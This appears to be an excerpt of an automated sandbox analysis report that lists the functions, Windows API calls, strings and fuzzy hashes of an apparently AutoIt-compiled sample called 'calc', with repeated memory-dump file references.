Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
String ID:
API String ID: 372113273-0
Opcode ID: 9ecf42e750dd20d58ba297a2de3f40783d5e83dbea0e0e233273d38df79948fd
Instruction ID: f30265a1fcac77ba34f8cd65a0e3c2bfe06a34cf91edbd35c06c720051772893
Opcode Fuzzy Hash: 9ecf42e750dd20d58ba297a2de3f40783d5e83dbea0e0e233273d38df79948fd
Instruction Fuzzy Hash: 27115A32100248BBDF119F64EC48FDA7B69EF49320F148525FD18662E1C7759910DB64

Function 00414563 Relevance: 9.0, APIs: 6, Instructions: 41windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00414572
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0041458A
GetWindowThreadProcessId.USER32(?,?), ref: 0041459C
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 004145AB
TerminateProcess.KERNEL32(00000000,00000000), ref: 004145B5
CloseHandle.KERNEL32(00000000), ref: 004145BC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 00d819eeed1d390f532930fa1349814da3c729ed7603d7904b804da2bb56bfe2
Instruction ID: ed9ddd3d8bd6e0158ad2fd664c2ba70d314683d2c30b968afa84626bca73c302
Opcode Fuzzy Hash: 00d819eeed1d390f532930fa1349814da3c729ed7603d7904b804da2bb56bfe2
Instruction Fuzzy Hash: 32F0F97214122DFBEB215B62DC0DEEF3E6CEF457A2F004124FA0595062E7719E52DAA4

Function 0040EF2E Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 222libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00000000), ref: 0040EFB1
GetProcAddress.KERNEL32(?,AU3_FreeVar), ref: 0040EFBE
_strlen.LIBCMT ref: 0040F06F
_strcat.LIBCMT ref: 0040F080

Strings

AU3_FreeVar, xrefs: 0040EFB3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressProc$_strcat_strlen
String ID: AU3_FreeVar
API String ID: 3781172953-771828931
Opcode ID: c5dcbb9b8891fedb1f816ad2417109749558be5e56ce4eb07ca54ed0d41f31cf
Instruction ID: c71524f2f339666a60e8fdc2e6ee78f872a6af596eaf6628cc854a2bbacd3a1d
Opcode Fuzzy Hash: c5dcbb9b8891fedb1f816ad2417109749558be5e56ce4eb07ca54ed0d41f31cf
Instruction Fuzzy Hash: 3371C231900206EFDB20AF66C8419AE77A1FF04314F15457FF805BB692CB78AD51DB99

Function 0042E1C8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 0042FF39: LoadLibraryA.KERNEL32(kernel32.dll,0042E1E0), ref: 0042FF44
Part of subcall function 0042FF39: GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 0042FF56

GlobalMemoryStatus.KERNEL32(?), ref: 0042E2D2
FreeLibrary.KERNEL32(00000000), ref: 0042E40A

Strings

@, xrefs: 0042E1F0
, xrefs: 0042E2CB
su, xrefs: 0042E40A

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Library$AddressFreeGlobalLoadMemoryProcStatus
String ID: $@$su
API String ID: 994989557-3537038830
Opcode ID: 755732f14303fd7855877f7d53b39952d9f77ec8dbe8b95e36a72e8eda6e09c8
Instruction ID: 13678e41d3e0e1f1e17025958ba3afce431628d6abb03d136634acb3700533c3
Opcode Fuzzy Hash: 755732f14303fd7855877f7d53b39952d9f77ec8dbe8b95e36a72e8eda6e09c8
Instruction Fuzzy Hash: 9B716030A04E1CE7CF10AFA6F945ADDBBB0FF4C316F115099E584A2185DF7A95A4C70A

Function 0042A72A Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

Part of subcall function 0042FE9D: LoadLibraryA.KERNEL32(Wininet.dll,0042A74E), ref: 0042FEA8
Part of subcall function 0042FE9D: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 0042FEBA

FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000), ref: 0042A886

Part of subcall function 0041FAEE: LoadStringW.USER32(00000066,?,00000FFF,00479E08), ref: 0041FB43
Part of subcall function 0041FAEE: LoadStringW.USER32(0047BD30,?,00000FFF), ref: 0041FB56

FreeLibrary.KERNEL32(00000000,0000008C,000000FF), ref: 0042A76B

Strings

abort, xrefs: 0042A790
su, xrefs: 0042A76B, 0042A886

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: LibraryLoad$FreeString$AddressProc
String ID: abort$su
API String ID: 160771276-2663150911
Opcode ID: 959bd9e425b7cd7b2e0e749f0e19e3e935c99c9a3cc62746977b244b63f99125
Instruction ID: 05c2d4eacd22ad3a369de7ab5a96b2d38cb26c9fb751937e48658670b96f3f86
Opcode Fuzzy Hash: 959bd9e425b7cd7b2e0e749f0e19e3e935c99c9a3cc62746977b244b63f99125
Instruction Fuzzy Hash: D241F730B00224FBDB15AB65E8457AAB3A4AF08315F50816BFC1596242C73C9E66CBDF

Function 00402EA9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetDlgCtrlID.USER32(00000000), ref: 00402EC5
GetClassNameW.USER32(00000000,?,00000100), ref: 00402EFE
GetClassNameW.USER32(00000000,?,00000100), ref: 00402F32
GetWindowTextW.USER32(00000000,?,00000400), ref: 00402FA8

Strings

%s%u, xrefs: 00402F65

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ClassName$CtrlTextWindow
String ID: %s%u
API String ID: 1688678639-679674701
Opcode ID: 947148774540dff31e6aed68a01ca84cde0561eaa18c795ad85923dc22bcf546
Instruction ID: 59a3a07e9672421e03da28893bea5f44c94612d97090578beec70d5de532437a
Opcode Fuzzy Hash: 947148774540dff31e6aed68a01ca84cde0561eaa18c795ad85923dc22bcf546
Instruction Fuzzy Hash: A8418371800209AFDB61DF50CA88BABB7F8FF14305F10846AE846A25C1E778FE45DB54

Function 00402148 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004021EC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004021FD
SendMessageW.USER32(?,00000189,00000000,00000000), ref: 0040221C

Strings

ComboBox, xrefs: 0040215F
ListBox, xrefs: 0040219E

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: ce447b253be3febd0b8e07ac2eaa564c4ee394673d04f414bee972a33d411258
Instruction ID: d60bcdc587e95717233e0f7665ce71fa6e7cb240bbe0e6ca57382d096394546a
Opcode Fuzzy Hash: ce447b253be3febd0b8e07ac2eaa564c4ee394673d04f414bee972a33d411258
Instruction Fuzzy Hash: A931E531940214BADF216BA5DC4ABDE7FB49F05324F1041EBF5007B1E2C7B9498A9B48

Function 0040B89C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,00000000,0000002C), ref: 0040B938
IsMenu.USER32(?), ref: 0040B94B
InsertMenuItemW.USER32(?,?,00000001,0000002C), ref: 0040B993
DrawMenuBar.USER32(?), ref: 0040B9A3

Strings

,, xrefs: 0040B8AE

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: ,
API String ID: 3076010158-3772416878
Opcode ID: 39640288cca488a7b30a7f5d3a4a61f8e094b4a337d8e2623057536b5fde24b8
Instruction ID: 157fbe030ffd1d9a8f4ddc3f90bad3240d8ce1212160fce4c0ed0f8fe47e7c62
Opcode Fuzzy Hash: 39640288cca488a7b30a7f5d3a4a61f8e094b4a337d8e2623057536b5fde24b8
Instruction Fuzzy Hash: 173148B1900208EFDB10CF64D984ADABBB5FF85304F14806AEA51AB3A1D738DD45DF98

Function 0040EE82 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 0040EEA9
GetProcAddress.KERNEL32(00000000,AU3_GetPluginDetails), ref: 0040EEC1
FreeLibrary.KERNEL32 ref: 0040EECD

Strings

AU3_GetPluginDetails, xrefs: 0040EEBB
su, xrefs: 0040EECD

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: AU3_GetPluginDetails$su
API String ID: 145871493-4193532315
Opcode ID: bf52db12d3d9933b844a19cd8c859c7f95544091a9fd9c7a58190ead5e102cca
Instruction ID: e1a76256ef9ae7ff8ee669f6e948607f4e0c31d0b2043c83b6dad8dec330593a
Opcode Fuzzy Hash: bf52db12d3d9933b844a19cd8c859c7f95544091a9fd9c7a58190ead5e102cca
Instruction Fuzzy Hash: 5E117C72600209EFDB258F66CC44B9A7BE8FB513A2F10487AE546E71D0D734DA50CA98

Function 0044AEC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0044AECF

Part of subcall function 0044C6DB: RtlEnterCriticalSection.NTDLL(?), ref: 0044C703

GetCurrentProcess.KERNEL32(?,0045B120,00000008,0044AFA2,?,00000001,00000000,00454705,00000003), ref: 0044AEE8
TerminateProcess.KERNEL32(00000000), ref: 0044AEEF

Strings

HPF, xrefs: 0044AF34
TPF, xrefs: 0044AF44

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Process$CriticalCurrentEnterSectionTerminate__lock
String ID: HPF$TPF
API String ID: 3423101658-1347700362
Opcode ID: 01c87344a4cae5e3681496b825a42178ba2a6b050c6aa545966f9789e09d8f4c
Instruction ID: 94eac9cb3b00db43925a1aac6e74254190fb75927c93439ef9a830854e02c62f
Opcode Fuzzy Hash: 01c87344a4cae5e3681496b825a42178ba2a6b050c6aa545966f9789e09d8f4c
Instruction Fuzzy Hash: 4211E971881610EFEB11AF65DC0514E7B65EB40715B20852BF4504A1A2EF7C88A68B5F

Function 00409CDF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00409D15
GetStockObject.GDI32(00000011), ref: 00409D2B
SendMessageW.USER32(00000000,00000030,00000000), ref: 00409D35
ShowWindow.USER32(00000000,00000000,?,0040AA2A,?,Combobox,00000000,00000000,?,?,?,?,00000000,00000000,00000001,?), ref: 00409D4D

Strings

P, xrefs: 00409CE2

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Window$CreateMessageObjectSendShowStock
String ID: P
API String ID: 1358664141-3110715001
Opcode ID: 80a01e5952e50f59478d35168b5b5eb0f65f36e5d1155f84b8e4c2303647d9f8
Instruction ID: 7eed761070e5c0e1afa5280e21cb20fe8a54fd27ed28cfac5585aa4bc5c1357b
Opcode Fuzzy Hash: 80a01e5952e50f59478d35168b5b5eb0f65f36e5d1155f84b8e4c2303647d9f8
Instruction Fuzzy Hash: 99015773104289BFDF124FA09C88EEA3F6AAF88355F058129FB54511A2C3368CA5EB15

Function 00454432 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,0045C190,00000010,0044C68C,00000000,00000FA0,0045B3A0,00000008,0044C6F4,?,?,?,00449A5F,00000004,0045B068,0000000C), ref: 00454455
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00454465

Strings

kernel32.dll, xrefs: 00454450
`su, xrefs: 00454455
InitializeCriticalSectionAndSpinCount, xrefs: 0045445F

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: InitializeCriticalSectionAndSpinCount$`su$kernel32.dll
API String ID: 1646373207-3452960175
Opcode ID: b2281aa7dc65de71af2c7f2e0e9f86939ad9221b3d5d80ab7c10ad16ea6640b2
Instruction ID: ab1926dd2af41fa3029d16cc9033a7aba392298642699e74dd3f1240ded0750e
Opcode Fuzzy Hash: b2281aa7dc65de71af2c7f2e0e9f86939ad9221b3d5d80ab7c10ad16ea6640b2
Instruction Fuzzy Hash: 96F09070580301ABDF249FB59C45B5936E0BB4575EF208626FC10992A3E77C8A8AEB0D

Function 004551AD Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 13libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0044DC95), ref: 004551B2
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004551C2

Strings

KERNEL32, xrefs: 004551AD
IsProcessorFeaturePresent, xrefs: 004551BC
`su, xrefs: 004551B2

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32$`su
API String ID: 1646373207-3654794662
Opcode ID: fc31ca84f5e165f95252b0e62b8a217bca41735e7ac5cce235b2bdaf83c21cb6
Instruction ID: 40fc8ca460b8c6a49fdf777bf37c8c5f379354e5d7432fbb057b73973fbd7f2c
Opcode Fuzzy Hash: fc31ca84f5e165f95252b0e62b8a217bca41735e7ac5cce235b2bdaf83c21cb6
Instruction Fuzzy Hash: 1EC04070785F05F7DE105BB15CA97373A585B44B43F244456BC09D05D3DE5CC908D52D

Function 00451219 Relevance: 7.7, APIs: 5, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

__set_statfp.LIBCMT ref: 00451239
__set_statfp.LIBCMT ref: 00451253
__set_statfp.LIBCMT ref: 00451275
__set_statfp.LIBCMT ref: 00451429

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: __set_statfp
String ID:
API String ID: 441778723-0
Opcode ID: 52ae6cc645bf3ce7b1888e412e0c71e2239a1c70beff03525a624c2e7823df0f
Instruction ID: aafa024366cfe14e36a4ce7ed12ccb1bd2abc6eada7316b3c0f4e51b7e6ebd75
Opcode Fuzzy Hash: 52ae6cc645bf3ce7b1888e412e0c71e2239a1c70beff03525a624c2e7823df0f
Instruction Fuzzy Hash: EB513731800E19D3EB144B94D8587AE7B70FF4135AF1946AADCE0A62F6CB78486DC34D

Function 00454A84 Relevance: 7.7, APIs: 5, Instructions: 184COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,0044D815,?), ref: 00454B37
InterlockedExchange.KERNEL32(00467970,00000001), ref: 00454BB5
InterlockedExchange.KERNEL32(00467970,00000000), ref: 00454C1A
InterlockedExchange.KERNEL32(00467970,00000001), ref: 00454C3E
InterlockedExchange.KERNEL32(00467970,00000000), ref: 00454C9E

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ExchangeInterlocked$QueryVirtual
String ID:
API String ID: 2947987494-0
Opcode ID: d3930fd77430739b71b2632bfe3ca3d3c1fc5acb29cc6cdf36d9155b892b8d0a
Instruction ID: c5d8ed88eee3e8925b2251e902281fd8498e535b2407cacacb70f59125c8bbb1
Opcode Fuzzy Hash: d3930fd77430739b71b2632bfe3ca3d3c1fc5acb29cc6cdf36d9155b892b8d0a
Instruction Fuzzy Hash: F0510A306556108FDB2A8F19C88476A73E1ABC571EF25412BDD528F293E378DCC9864D

Function 0044DA7D Relevance: 7.7, APIs: 5, Instructions: 166COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000000,0047E800,?,?,?,00000000,0047E800,?,00000010,00000000,?,00428642,?,0047E800,?), ref: 0044DB29
WideCharToMultiByte.KERNEL32(?,00000000,0047E800,000000FF,?,?,00000000,0047E800,?,00000010,00000000,?,00428642,?,0047E800,?), ref: 0044DB51
GetLastError.KERNEL32(?,00428642,?,0047E800,?), ref: 0044DB6C
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,0047E800,?,00428642,?,0047E800,?), ref: 0044DBAC
WideCharToMultiByte.KERNEL32(?,00000000,0047E800,000000FF,00000000,00000000,00000000,0047E800,?,00000010,00000000,?,00428642,?,0047E800,?), ref: 0044DC0A

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
